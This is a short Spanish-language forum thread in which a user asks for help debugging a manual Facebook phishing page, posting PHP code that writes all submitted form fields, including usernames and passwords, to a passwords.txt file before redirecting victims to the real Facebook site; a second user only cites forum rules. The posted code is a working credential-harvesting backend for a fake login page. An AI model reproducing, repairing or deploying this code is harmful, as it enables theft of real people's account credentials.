Hacking basico - consulta sobre pishing, las pass no se guardan

[noquiero]

Buenas, intento probar un fake para pishing, de forma manual (no SET).

El action fue editado para redirigir al code.php, el code.php incluye el siguiente codigo:

Código (php) [Seleccionar] Expandir


<?php
header ('Location:https://he-il.facebook.com/');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


Aunque tambien intente sin https (con http).
en el server estan el index.html, el code.php y el passwords.txt, ingreso user y pass,me reenvia a la web legitima pero sin guardar el pass.
Alguna idea? . gracias,saludos.

[Pablo Videla]

Son normas del foro. Hay que respetar sus reglas. Sino, no se puede participar. Debes ser mas prudente y hacer la pregunta de otra forma para llegar a la misma solución.